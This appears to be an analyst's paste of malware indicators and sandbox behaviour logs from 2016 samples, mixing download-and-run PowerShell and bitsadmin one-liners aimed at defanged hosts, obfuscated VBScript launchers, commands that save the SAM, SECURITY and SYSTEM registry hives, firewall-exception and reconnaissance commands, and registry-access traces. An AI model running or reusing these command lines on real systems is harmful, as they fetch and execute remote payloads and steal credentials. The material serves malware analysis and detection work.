maliciousThingsss

  1. "cmd /c "echo.>Windows_10_Activator_by_T3am_R3d_v1.7_2016.exe:Zone.Identifier""
  2.  
  3. " /c PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://mnmassagetherapy[.]com/wp-content/uploads/2016/04/88th0310_nw.exe','mess.exe');Start-Process 'mess.exe'"
  4.  
  5. GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  6.  
  7. Set qYdIRkazmpwLrkmIp = Createobject("WScRiPt.shelL")
  8. QYDiRkAzMPWLRkmIP.rUN """C:\Users\CwDYSF1\AppData\Roaming\Microsoft\log\securityscan.exe"""
  9.  
  10. integration SKPol
  11. network
  12. fwmanagement
  13.  
  14.  
  15. cmd.exe /r powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object System.Net.WebClient).DownloadFile('hxxp://4thkantonind[.]top/egypt/hashish/afghankush.php','%TEMP%\calc.exe');Start '%TEMP%\calc.exe';
  16. %WINDIR%\system32\wbem\wmiprvse.exe -secured -Embedding
  17. regasm.exe
  18. hh.exe
  19.  
  20. "/c bitsadmin /transfer myjob /download /priority high "hxxp://cta.edu[.]pe/real/let.exe" "%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit" on 2016-9-16.04:29:00.000
  21.  
  22. Copyright 1995-2012 Mark Adler  (probably the zlib/inflate copyright string embedded in the sample — a library artifact, not a usable indicator on its own)
  23. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"
  24. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"
  25. %WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"
  26. %WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all
  27. %WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE
  28. %WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe
  29. %WINDIR%\system32\cmd.exe /k HOSTNAME
  30. %WINDIR%\system32\cmd.exe /k ipconfig
  31. %WINDIR%\system32\cmd.exe /k systeminfo
  32.  
  33. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032217-00003856)
  34. Spawned process "netsh.exe" with commandline "netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" (UID: 00032623-00003972)
  35. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" (UID: 00036046-00002100)
  36. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" (UID: 00036050-00000496)
  37. Spawned process "pass.exe" with commandline "all" (UID: 00036516-00001992)
  38. Spawned process "taskkill.exe" with commandline "taskkill /f /im chrome.exe" (UID: 00036541-00002228)
  39. Spawned process "pass.exe" with commandline "all" (UID: 00038175-00002296)
  40. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" (UID: 00039208-00001444)
  41. Spawned process "reg.exe" with commandline "save hklm\sam sam.save" (UID: 00039409-00001940)
  42. Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" (UID: 00039658-00002556)
  43. Spawned process "reg.exe" with commandline "save hklm\security security.save" (UID: 00039867-00002588)
  44. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.09:06:00.610
  45. "%WINDIR%\system32\cmd.exe /c netsh firewall add allowedprogram program = STcONaURjstoJeQ(uMqeEfSfaGeNmho("yJmAEIBBXdvRXSFRGegUiJnA")) name = STcONaURjstoJeQ(uMqeEfSfaGeNmho("XQ0V1bwVGZ0FQZ==")) mode = ENABLE" on 2016-10-24.09:16:00.180
  46. "%WINDIR%\system32\cmd.exe /c taskkill /f /im chrome.exe" on 2016-10-24.09:52:00.540
  47. "%WINDIR%\system32\cmd.exe /c %APPDATA%\Microsoft\log\pass.exe all" on 2016-10-24.09:52:00.600
  48. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\sam sam.save"" on 2016-10-24.10:23:00.500
  49. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\security security.save"" on 2016-10-24.10:27:00.901
  50. "%WINDIR%\system32\cmd.exe /c "reg.exe save hklm\system system.save"" on 2016-10-24.10:32:00.410
  51. "%WINDIR%\system32\cmd.exe /k systeminfo" on 2016-10-24.10:48:00.120
  52. "%WINDIR%\system32\cmd.exe /k ipconfig" on 2016-10-24.11:20:00.670
  53. "%WINDIR%\system32\cmd.exe /k HOSTNAME" on 2016-10-24.11:39:00.300
  54.  
  55.  
  56.  
  57.  
  58. Reads Windows Trust Settings
  59. details
  60. "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
  61.  
  62. "Pa_001.exe" issued a query "Select * from AntiVirusProduct"
  63. "taskkill.exe" issued a query "SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")0"
  64. "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
  65.  
  66. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA"; Key: "BLOB")
  67. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\109F1CAED645BB78B3EA2B94C0697C740733031C"; Key: "BLOB")
  68. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")
  69. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")
  70. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")
  71. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6"; Key: "BLOB")
  72. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES\7D7F4414CCEF168ADF6BF40753B5BECD78375931"; Key: "BLOB")
  73. "securityscan.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\PROTECTEDROOTS"; Key: "CERTIFICATES")
  74. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\18F7C1FCC3090203FD5BAA2F861A754976C8DD25"; Key: "BLOB")
  75. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\245C97DF7514E7CF2DF8BE72AE957B9E04741E85"; Key: "BLOB")
  76. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\7F88CD7223F3C813818C994614A89C99FA3B5247"; Key: "BLOB")
  77. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\A43489159A520F0D93D032CCAF37E7FE20A8B419"; Key: "BLOB")
  78. "securityscan.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\BE36A4562FB2EE05DBB3D32323ADF445084ED656"; Key: "BLOB")
  79.  
  80.  
  81. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  82. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  83. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  84. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  85. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA")
  86. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CERTIFICATES")
  87. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLS")
  88. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLS")
  89. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  90. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  91. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  92. "<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  93. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED")
  94. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CERTIFICATES")
  95. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLS")
  96. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLS")
  97. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT")
  98. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES")
  99. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLS")
  100. "<Input Sample>" (Access type: "CREATE"; Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLS")
  101.  
  102.  
  103. "<Input Sample>" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\crypt32" (Filter: 4)
  104. "<Input Sample>" monitors "HKCU\Software\Microsoft\SystemCertificates\Root" (Filter: 5; Subtree: 1)
  105. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT" (Filter: 5; Subtree: 1)
  106. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot" (Filter: 5; Subtree: 1)
  107. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  108. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root" (Filter: 5; Subtree: 1)
  109. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  110. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\SmartCardRoot" (Filter: 5; Subtree: 1)
  111. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  112. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Policies\Microsoft\SystemCertificates" (Filter: 5; Subtree: 1)
  113. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust" (Filter: 5; Subtree: 1)
  114. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust" (Filter: 5; Subtree: 1)
  115. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  116. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA" (Filter: 5; Subtree: 1)
  117. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA" (Filter: 5; Subtree: 1)
  118. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  119. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed" (Filter: 5; Subtree: 1)
  120. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed" (Filter: 5; Subtree: 1)
  121. "<Input Sample>" monitors "\REGISTRY\USER\S-1-5-21-4162757579-3804539371-4239455898-1000\Software\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  122. "<Input Sample>" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople" (Filter: 5; Subtree: 1)
  123.  
  124.  
  125. End Function"